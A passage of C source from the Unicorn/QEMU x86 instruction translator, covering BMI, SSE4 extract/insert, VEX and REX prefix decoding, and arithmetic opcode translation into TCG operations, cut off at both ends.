*/ zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_add2_tl(tcg_ctx, s->T0, carry_out, s->T0, zero, carry_in, zero); tcg_gen_add2_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], carry_out, tcg_ctx->cpu_regs[reg], carry_out, s->T0, zero); tcg_temp_free(tcg_ctx, zero); break; } set_cc_op(s, end_op); } break; case 0x1f7: /* shlx Gy, Ey, By */ case 0x2f7: /* sarx Gy, Ey, By */ case 0x3f7: /* shrx Gy, Ey, By */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); if (ot == MO_64) { tcg_gen_andi_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v], 63); } else { tcg_gen_andi_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v], 31); } if (b == 0x1f7) { tcg_gen_shl_tl(tcg_ctx, s->T0, s->T0, s->T1); } else if (b == 0x2f7) { if (ot != MO_64) { tcg_gen_ext32s_tl(tcg_ctx, s->T0, s->T0); } tcg_gen_sar_tl(tcg_ctx, s->T0, s->T0, s->T1); } else { if (ot != MO_64) { tcg_gen_ext32u_tl(tcg_ctx, s->T0, s->T0); } tcg_gen_shr_tl(tcg_ctx, s->T0, s->T0, s->T1); } gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0x0f3: case 0x1f3: case 0x2f3: case 0x3f3: /* Group 17 */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); switch (reg & 7) { case 1: /* blsr By,Ey */ tcg_gen_subi_tl(tcg_ctx, s->T1, s->T0, 1); tcg_gen_and_tl(tcg_ctx, s->T0, s->T0, s->T1); break; case 2: /* blsmsk By,Ey */ tcg_gen_subi_tl(tcg_ctx, s->T1, s->T0, 1); tcg_gen_xor_tl(tcg_ctx, s->T0, s->T0, s->T1); break; case 3: /* blsi By, Ey */ tcg_gen_neg_tl(tcg_ctx, s->T1, s->T0); tcg_gen_and_tl(tcg_ctx, s->T0, s->T0, s->T1); break; default: goto unknown_op; } tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); gen_op_mov_reg_v(s, ot, s->vex_v, s->T0); set_cc_op(s, CC_OP_BMILGB + ot); break; default: goto unknown_op; } break; case 0x03a: case 0x13a: b = modrm; modrm = x86_ldub_code(env, s); rm = modrm & 7; reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; if (b1 >= 2) { goto unknown_op; } sse_fn_eppi = sse_op_table7[b].op[b1]; if (!sse_fn_eppi) { goto unknown_op; } if (!(s->cpuid_ext_features & sse_op_table7[b].ext_mask)) goto illegal_op; s->rip_offset = 1; if (sse_fn_eppi == SSE_SPECIAL) { ot = mo_64_32(s->dflag); rm = (modrm & 7) | REX_B(s); if (mod != 3) gen_lea_modrm(env, s, modrm); reg = ((modrm >> 3) & 7) | rex_r; val = x86_ldub_code(env, s); switch (b) { case 0x14: /* pextrb */ tcg_gen_ld8u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_B(val & 15))); if (mod == 3) { gen_op_mov_reg_v(s, ot, rm, s->T0); } else { tcg_gen_qemu_st_tl(tcg_ctx, s->T0, s->A0, s->mem_index, MO_UB); } break; case 0x15: /* pextrw */ tcg_gen_ld16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_W(val & 7))); if (mod == 3) { gen_op_mov_reg_v(s, ot, rm, s->T0); } else { tcg_gen_qemu_st_tl(tcg_ctx, s->T0, s->A0, s->mem_index, MO_LEUW); } break; case 0x16: if (ot == MO_32) { /* pextrd */ tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(val & 3))); if (mod == 3) { tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[rm], s->tmp2_i32); } else { tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); } } else { /* pextrq */ #ifdef TARGET_X86_64 tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(val & 1))); if 
(mod == 3) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_regs[rm], s->tmp1_i64); } else { tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); } #else goto illegal_op; #endif } break; case 0x17: /* extractps */ tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(val & 3))); if (mod == 3) { gen_op_mov_reg_v(s, ot, rm, s->T0); } else { tcg_gen_qemu_st_tl(tcg_ctx, s->T0, s->A0, s->mem_index, MO_LEUL); } break; case 0x20: /* pinsrb */ if (mod == 3) { gen_op_mov_v_reg(s, MO_32, s->T0, rm); } else { tcg_gen_qemu_ld_tl(tcg_ctx, s->T0, s->A0, s->mem_index, MO_UB); } tcg_gen_st8_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_B(val & 15))); break; case 0x21: /* insertps */ if (mod == 3) { tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[rm] .ZMM_L((val >> 6) & 3))); } else { tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); } tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg] .ZMM_L((val >> 4) & 3))); if ((val >> 0) & 1) tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0))); if ((val >> 1) & 1) tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(1))); if ((val >> 2) & 1) tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2))); if ((val >> 3) & 1) tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3))); break; case 0x22: if (ot == MO_32) { /* pinsrd */ if (mod == 3) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[rm]); } else { tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); } tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(val & 3))); } else { /* pinsrq */ #ifdef TARGET_X86_64 if (mod == 3) { gen_op_mov_v_reg(s, ot, s->tmp1_i64, rm); } else { tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); } tcg_gen_st_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(val & 1))); #else goto illegal_op; #endif } break; } return; } if (b1) { op1_offset = offsetof(CPUX86State,xmm_regs[reg]); if (mod == 3) { op2_offset = offsetof(CPUX86State,xmm_regs[rm | REX_B(s)]); } else { op2_offset = offsetof(CPUX86State,xmm_t0); gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, op2_offset); } } else { op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); if (mod == 3) { op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } else { op2_offset = offsetof(CPUX86State,mmx_t0); gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, op2_offset); } } val = x86_ldub_code(env, s); if ((b & 0xfc) == 0x60) { /* pcmpXstrX */ set_cc_op(s, CC_OP_EFLAGS); if (s->dflag == MO_64) { /* The helper must use entire 64-bit gp registers */ val |= 1 << 8; } } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_eppi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1, tcg_const_i32(tcg_ctx, val)); break; case 0x33a: /* Various integer extensions at 0f 3a f[0-f]. 
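   (Added commentary: of this group only RORX is implemented below, a
   VEX-encoded rotate right by immediate that, unlike ROR, leaves
   EFLAGS untouched, which is why no cc_op update follows it.)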
*/ b = modrm | (b1 << 8); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; switch (b) { case 0x3f0: /* rorx Gy,Ey, Ib */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); b = x86_ldub_code(env, s); if (ot == MO_64) { tcg_gen_rotri_tl(tcg_ctx, s->T0, s->T0, b & 63); } else { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_rotri_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, b & 31); tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); } gen_op_mov_reg_v(s, ot, reg, s->T0); break; default: goto unknown_op; } break; default: unknown_op: gen_unknown_opcode(env, s); return; } } else { /* generic MMX or SSE operation */ switch(b) { case 0x70: /* pshufx insn */ case 0xc6: /* pshufx insn */ case 0xc2: /* compare insns */ s->rip_offset = 1; break; default: break; } if (is_xmm) { op1_offset = offsetof(CPUX86State,xmm_regs[reg]); if (mod != 3) { int sz = 4; gen_lea_modrm(env, s, modrm); op2_offset = offsetof(CPUX86State,xmm_t0); switch (b) { case 0x50: case 0x51: case 0x52: case 0x53: case 0x54: case 0x55: case 0x56: case 0x57: case 0x58: case 0x59: case 0x5a: case 0x5c: case 0x5d: case 0x5e: case 0x5f: case 0xc2: /* Most sse scalar operations. */ if (b1 == 2) { sz = 2; } else if (b1 == 3) { sz = 3; } break; case 0x2e: /* ucomis[sd] */ case 0x2f: /* comis[sd] */ if (b1 == 0) { sz = 2; } else { sz = 3; } break; } switch (sz) { case 2: /* 32 bit access */ gen_op_ld_v(s, MO_32, s->T0, s->A0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_t0.ZMM_L(0))); break; case 3: /* 64 bit access */ gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_t0.ZMM_D(0))); break; default: /* 128 bit access */ gen_ldo_env_A0(s, op2_offset); break; } } else { rm = (modrm & 7) | REX_B(s); op2_offset = offsetof(CPUX86State,xmm_regs[rm]); } } else { op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); if (mod != 3) { gen_lea_modrm(env, s, modrm); op2_offset = offsetof(CPUX86State,mmx_t0); gen_ldq_env_A0(s, op2_offset); } else { rm = (modrm & 7); op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } } switch(b) { case 0x0f: /* 3DNow! data insns */ val = x86_ldub_code(env, s); sse_fn_epp = sse_op_table5[val]; if (!sse_fn_epp) { goto unknown_op; } if (!(s->cpuid_ext2_features & CPUID_EXT2_3DNOW)) { goto illegal_op; } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x70: /* pshufx insn */ case 0xc6: /* pshufx insn */ val = x86_ldub_code(env, s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); /* XXX: introduce a new table? 
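   (Added commentary: the cast below works because the pshuf/shuf style
   helpers take only destination, source and immediate, with no env
   pointer, so the table entry stored with the epp type is re-invoked
   under the ppi signature.)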
*/ sse_fn_ppi = (SSEFunc_0_ppi)sse_fn_epp; sse_fn_ppi(tcg_ctx, s->ptr0, s->ptr1, tcg_const_i32(tcg_ctx, val)); break; case 0xc2: /* compare insns */ val = x86_ldub_code(env, s); if (val >= 8) goto unknown_op; sse_fn_epp = sse_op_table4[val][b1]; tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0xf7: /* maskmov : we must prepare A0 */ if (mod != 3) goto illegal_op; tcg_gen_mov_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_EDI]); gen_extu(tcg_ctx, s->aflag, s->A0); gen_add_A0_ds_seg(s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); /* XXX: introduce a new table? */ sse_fn_eppt = (SSEFunc_0_eppt)sse_fn_epp; sse_fn_eppt(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1, s->A0); break; default: tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; } if (b == 0x2e || b == 0x2f) { set_cc_op(s, CC_OP_EFLAGS); } } } // Unicorn: sync EFLAGS on demand static void sync_eflags(DisasContext *s, TCGContext *tcg_ctx) { gen_update_cc_op(s); gen_helper_read_eflags(tcg_ctx, s->T0, tcg_ctx->cpu_env); tcg_gen_st_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, eflags)); } /* convert one instruction. s->base.is_jmp is set if the translation must be stopped. Return the next pc value */ static target_ulong disas_insn(DisasContext *s, CPUState *cpu) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CPUX86State *env = cpu->env_ptr; int b, prefixes, prefix_count; int shift; MemOp ot, aflag, dflag; int modrm, reg, rm, mod, op, opreg, val; target_ulong next_eip, tval; int rex_w, rex_r, rex_byte, rex_index; target_ulong pc_start = s->base.pc_next; TCGOp *tcg_op, *prev_op = NULL; bool insn_hook = false; s->pc_start = tcg_ctx->pc_start = s->pc = pc_start; s->prefix = 0; s->uc = env->uc; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(env->uc, s->pc)) { // imitate the HLT instruction gen_update_cc_op(s); gen_sync_pc(tcg_ctx, pc_start - s->cs_base); gen_helper_hlt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); s->base.is_jmp = DISAS_NORETURN; return s->pc; } // Unicorn: callback might need to access to EFLAGS, // or want to stop emulation immediately if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, pc_start)) { if (s->last_cc_op != s->cc_op) { sync_eflags(s, tcg_ctx); s->last_cc_op = s->cc_op; } // Sync PC in advance gen_sync_pc(tcg_ctx, pc_start - s->cs_base); // save the last operand prev_op = tcg_last_op(tcg_ctx); insn_hook = true; gen_uc_tracecode(tcg_ctx, 0xf1f1f1f1, UC_HOOK_CODE_IDX, env->uc, pc_start); check_exit_request(tcg_ctx); } s->override = -1; #ifdef TARGET_X86_64 s->rex_x = 0; s->rex_b = 0; s->x86_64_hregs = false; #endif s->rip_offset = 0; /* for relative ip address */ s->vex_l = 0; s->vex_v = 0; if (sigsetjmp(s->jmpbuf, 0) != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); return s->pc; } prefixes = 0; rex_w = -1; rex_r = 0; rex_byte = 0; rex_index = -1; prefix_count = 0; next_byte: b = x86_ldub_code(env, s); /* Collect prefixes. 
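   (Added commentary: the switch below consumes the legacy prefix
   groups (f0 LOCK, f2/f3 REP, the six segment overrides, 66
   operand-size, 67 address-size), plus REX bytes in 64-bit mode and
   the c4/c5 VEX escapes, counting them so that a REX prefix can later
   be ignored unless it immediately precedes the opcode.)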
*/ switch (b) { case 0xf3: prefixes |= PREFIX_REPZ; prefix_count++; goto next_byte; case 0xf2: prefixes |= PREFIX_REPNZ; prefix_count++; goto next_byte; case 0xf0: prefixes |= PREFIX_LOCK; prefix_count++; goto next_byte; case 0x2e: s->override = R_CS; prefix_count++; goto next_byte; case 0x36: s->override = R_SS; prefix_count++; goto next_byte; case 0x3e: s->override = R_DS; prefix_count++; goto next_byte; case 0x26: s->override = R_ES; prefix_count++; goto next_byte; case 0x64: s->override = R_FS; prefix_count++; goto next_byte; case 0x65: s->override = R_GS; prefix_count++; goto next_byte; case 0x66: prefixes |= PREFIX_DATA; prefix_count++; goto next_byte; case 0x67: prefixes |= PREFIX_ADR; prefix_count++; goto next_byte; #ifdef TARGET_X86_64 case 0x40: case 0x41: case 0x42: case 0x43: case 0x44: case 0x45: case 0x46: case 0x47: case 0x48: case 0x49: case 0x4a: case 0x4b: case 0x4c: case 0x4d: case 0x4e: case 0x4f: if (CODE64(s)) { rex_byte = b; rex_index = prefix_count; prefix_count++; goto next_byte; } break; #endif case 0xc5: /* 2-byte VEX */ case 0xc4: /* 3-byte VEX */ /* VEX prefixes cannot be used except in 32-bit mode. Otherwise the instruction is LES or LDS. */ if (s->code32 && !s->vm86) { static const int pp_prefix[4] = { 0, PREFIX_DATA, PREFIX_REPZ, PREFIX_REPNZ }; int vex3, vex2 = x86_ldub_code(env, s); if (!CODE64(s) && (vex2 & 0xc0) != 0xc0) { /* 4.1.4.6: In 32-bit mode, bits [7:6] must be 11b, otherwise the instruction is LES or LDS. */ s->pc--; /* rewind the advance_pc() x86_ldub_code() did */ break; } /* 4.1.1-4.1.3: No preceding lock, 66, f2, f3, or rex prefixes. */ if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ | PREFIX_LOCK | PREFIX_DATA)) { goto illegal_op; } #ifdef TARGET_X86_64 if (rex_byte != 0) { goto illegal_op; } #endif rex_r = (~vex2 >> 4) & 8; if (b == 0xc5) { /* 2-byte VEX prefix: RVVVVlpp, implied 0f leading opcode byte */ vex3 = vex2; b = x86_ldub_code(env, s) | 0x100; } else { /* 3-byte VEX prefix: RXBmmmmm wVVVVlpp */ #ifdef TARGET_X86_64 s->rex_x = (~vex2 >> 3) & 8; s->rex_b = (~vex2 >> 2) & 8; #endif vex3 = x86_ldub_code(env, s); rex_w = (vex3 >> 7) & 1; switch (vex2 & 0x1f) { case 0x01: /* Implied 0f leading opcode bytes. */ b = x86_ldub_code(env, s) | 0x100; break; case 0x02: /* Implied 0f 38 leading opcode bytes. */ b = 0x138; break; case 0x03: /* Implied 0f 3a leading opcode bytes. */ b = 0x13a; break; default: /* Reserved for future use. */ goto unknown_op; } } s->vex_v = (~vex3 >> 3) & 0xf; s->vex_l = (vex3 >> 2) & 1; prefixes |= pp_prefix[vex3 & 3] | PREFIX_VEX; } prefix_count++; break; } /* Post-process prefixes. */ if (CODE64(s)) { /* 2.2.1: A REX prefix is ignored when it does not immediately precede the opcode byte */ if (rex_byte != 0 && rex_index + 1 == prefix_count) { /* REX prefix */ rex_w = (rex_byte >> 3) & 1; rex_r = (rex_byte & 0x4) << 1; s->rex_x = (rex_byte & 0x2) << 2; REX_B(s) = (rex_byte & 0x1) << 3; /* select uniform byte register addressing */ s->x86_64_hregs = true; } /* In 64-bit mode, the default data size is 32-bit. Select 64-bit data with rex_w, and 16-bit data with 0x66; rex_w takes precedence over 0x66 if both are present. */ dflag = (rex_w > 0 ? MO_64 : prefixes & PREFIX_DATA ? MO_16 : MO_32); /* In 64-bit mode, 0x67 selects 32-bit addressing. */ aflag = (prefixes & PREFIX_ADR ? MO_32 : MO_64); } else { /* In 16/32-bit mode, 0x66 selects the opposite data size. */ if (s->code32 ^ ((prefixes & PREFIX_DATA) != 0)) { dflag = MO_32; } else { dflag = MO_16; } /* In 16/32-bit mode, 0x67 selects the opposite addressing. 
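   (Added commentary: i.e. the prefix XORs the mode default, so 67 in
   32-bit code selects 16-bit addressing and in 16-bit code selects
   32-bit addressing, mirroring the data-size toggle just above.)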
*/ if (s->code32 ^ ((prefixes & PREFIX_ADR) != 0)) { aflag = MO_32; } else { aflag = MO_16; } } s->prefix = prefixes; s->aflag = aflag; s->dflag = dflag; /* now check op code */ reswitch: switch(b) { case 0x0f: /**************************/ /* extended op code */ b = x86_ldub_code(env, s) | 0x100; goto reswitch; /**************************/ /* arith & logic */ case 0x00: case 0x01: case 0x02: case 0x03: case 0x04: case 0x05: case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x10: case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x20: case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x30: case 0x31: case 0x32: case 0x33: case 0x34: case 0x35: case 0x38: case 0x39: case 0x3a: case 0x3b: case 0x3c: case 0x3d: { int op, f, val; op = (b >> 3) & 7; f = (b >> 1) & 3; ot = mo_b_d(b, dflag); switch(f) { case 0: /* OP Ev, Gv */ modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod != 3) { gen_lea_modrm(env, s, modrm); opreg = OR_TMP0; } else if (op == OP_XORL && rm == reg) { xor_zero: /* xor reg, reg optimisation */ set_cc_op(s, CC_OP_CLR); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); gen_op_mov_reg_v(s, ot, reg, s->T0); break; } else { opreg = rm; } gen_op_mov_v_reg(s, ot, s->T1, reg); gen_op(s, op, ot, opreg); break; case 1: /* OP Gv, Ev */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; reg = ((modrm >> 3) & 7) | rex_r; rm = (modrm & 7) | REX_B(s); if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, ot, s->T1, s->A0); } else if (op == OP_XORL && rm == reg) { goto xor_zero; } else { gen_op_mov_v_reg(s, ot, s->T1, rm); } gen_op(s, op, ot, reg); break; case 2: /* OP A, Iv */ val = insn_get(env, s, ot); tcg_gen_movi_tl(tcg_ctx, s->T1, val); gen_op(s, op, ot, OR_EAX); break; } } break; case 0x82: if (CODE64(s)) goto illegal_op; /* fall through */ case 0x80: /* GRP1 */ case 0x81: case 0x83: { int val; ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); op = (modrm >> 3) & 7; if (mod != 3) { if (b == 0x83) s->rip_offset = 1; else s->rip_offset = insn_const_size(ot); gen_lea_modrm(env, s, modrm); opreg = OR_TMP0; } else { opreg = rm; } switch(b) { default: case 0x80: case 0x81: case 0x82: val = insn_get(env, s, ot); break; case 0x83: val = (int8_t)insn_get(env, s, MO_8); break; } tcg_gen_movi_tl(tcg_ctx, s->T1, val); gen_op(s, op, ot, opreg); } break; /**************************/ /* inc, dec, and other misc arith */ case 0x40: /* inc Gv */ case 0x41: /* inc Gv */ case 0x42: /* inc Gv */ case 0x43: /* inc Gv */ case 0x44: /* inc Gv */ case 0x45: /* inc Gv */ case 0x46: /* inc Gv */ case 0x47: /* inc Gv */ ot = dflag; gen_inc(s, ot, OR_EAX + (b & 7), 1); break; case 0x48: /* dec Gv */ case 0x49: /* dec Gv */ case 0x4a: /* dec Gv */ case 0x4b: /* dec Gv */ case 0x4c: /* dec Gv */ case 0x4d: /* dec Gv */ case 0x4e: /* dec Gv */ case 0x4f: /* dec Gv */ ot = dflag; gen_inc(s, ot, OR_EAX + (b & 7), -1); break; case 0xf6: /* GRP3 */ case 0xf7: ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); op = (modrm >> 3) & 7; if (mod != 3) { if (op == 0) { s->rip_offset = insn_const_size(ot); } gen_lea_modrm(env, s, modrm); /* For those below that handle locked memory, don't load here. 
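   (Added commentary: with a LOCK prefix the NOT case below is emitted
   as a single atomic xor-fetch with ~0, so the load-modify-store must
   stay fused in one atomic TCG op rather than using the separate load
   performed here.)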
*/ if (!(s->prefix & PREFIX_LOCK) || op != 2) { gen_op_ld_v(s, ot, s->T0, s->A0); } } else { gen_op_mov_v_reg(s, ot, s->T0, rm); } switch(op) { case 0: /* test */ val = insn_get(env, s, ot); tcg_gen_movi_tl(tcg_ctx, s->T1, val); gen_op_testl_T0_T1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); break; case 2: /* not */ if (s->prefix & PREFIX_LOCK) { if (mod == 3) { goto illegal_op; } tcg_gen_movi_tl(tcg_ctx, s->T0, ~0); tcg_gen_atomic_xor_fetch_tl(tcg_ctx, s->T0, s->A0, s->T0, s->mem_index, ot | MO_LE); } else { tcg_gen_not_tl(tcg_ctx, s->T0, s->T0); if (mod != 3) { gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_mov_reg_v(s, ot, rm, s->T0); } } break; case 3: /* neg */ if (s->prefix & PREFIX_LOCK) { TCGLabel *label1; TCGv a0, t0, t1, t2; if (mod == 3) { goto illegal_op; } a0 = tcg_temp_local_new(tcg_ctx); t0 = tcg_temp_local_new(tcg_ctx); label1 = gen_new_label(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, a0, s->A0); tcg_gen_mov_tl(tcg_ctx, t0, s->T0); gen_set_label(tcg_ctx, label1); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, t2, t0); tcg_gen_neg_tl(tcg_ctx, t1, t0); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, t0, a0, t0, t1, s->mem_index, ot | MO_LE); tcg_temp_free(tcg_ctx, t1); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, t0, t2, label1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, a0); tcg_gen_mov_tl(tcg_ctx, s->T0, t0); tcg_temp_free(tcg_ctx, t0); } else { tcg_gen_neg_tl(tcg_ctx, s->T0, s->T0); if (mod != 3) { gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_mov_reg_v(s, ot, rm, s->T0); } } gen_op_update_neg_cc(s); set_cc_op(s, CC_OP_SUBB + ot); break; case 4: /* mul */ switch(ot) { case MO_8: gen_op_mov_v_reg(s, MO_8, s->T1, R_EAX); tcg_gen_ext8u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext8u_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0, 0xff00); set_cc_op(s, CC_OP_MULB); break; case MO_16: gen_op_mov_v_reg(s, MO_16, s->T1, R_EAX); tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext16u_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_shri_tl(tcg_ctx, s->T0, s->T0, 16); gen_op_mov_reg_v(s, MO_16, R_EDX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); set_cc_op(s, CC_OP_MULW); break; default: case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mulu2_i32(tcg_ctx, s->tmp2_i32, s->tmp3_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], s->tmp2_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EDX], s->tmp3_i32); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_regs[R_EDX]); set_cc_op(s, CC_OP_MULL); break; #ifdef TARGET_X86_64 case MO_64: 